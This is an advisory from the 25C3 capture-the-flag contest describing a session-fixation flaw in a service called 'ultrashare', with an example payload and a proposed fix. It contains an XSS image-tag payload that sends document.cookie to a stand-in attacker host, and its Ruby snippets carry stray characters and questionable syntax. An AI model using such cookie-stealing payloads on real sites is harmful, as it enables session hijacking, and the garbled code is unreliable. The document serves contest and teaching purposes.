HC's Capture the Flag website
CTF Contests
25C3-CTF
25C3-CTF final results
Advisory #90
From team Ailuropoda Melanoleucas
New advisory by : Samsa
Affected service(s): ultrashare
Severity [lmh] : medium
===== Problem =====
The application maintain the same session id in both zones,
the public and the private one. Consecuently is it possible
to steal the cookie ID using another attack, for example
'XSS' in a public Zone. Injecting something like:
<img src='http://www.attacker.com/'.document.cookie />
The next source code demostrates this vulnerability:
when "login"
options = @db.login @cgi['username'], @cgi['password']
if (options[:errors].length == 0) thenI
@cgi.session['authorized'] = trueII <- The session ID should be regerated at this point
@cgi.session['user'] = @cgi['username']
mainMenu options
else
showLoginForm options
end
Once the session has been authorized, the attacker, who
already knows the sessionId, can access into de restricted zone.
===== Impact =====
- Access to an Admin Zone without authentication
===== Fix =====
To fix this flaw it's important to do an additional validation to the
session value before de login process, and reassign a new one if needed.
if (options[:errors].length == 0) then
@cgi.new Session ()I
@cgi.session['authorized'] = true
@cgi.session['user'] = @cgi['username']
ImainMenu options
Rating
[2] Yes. You're right. Sessions should be used more carefully.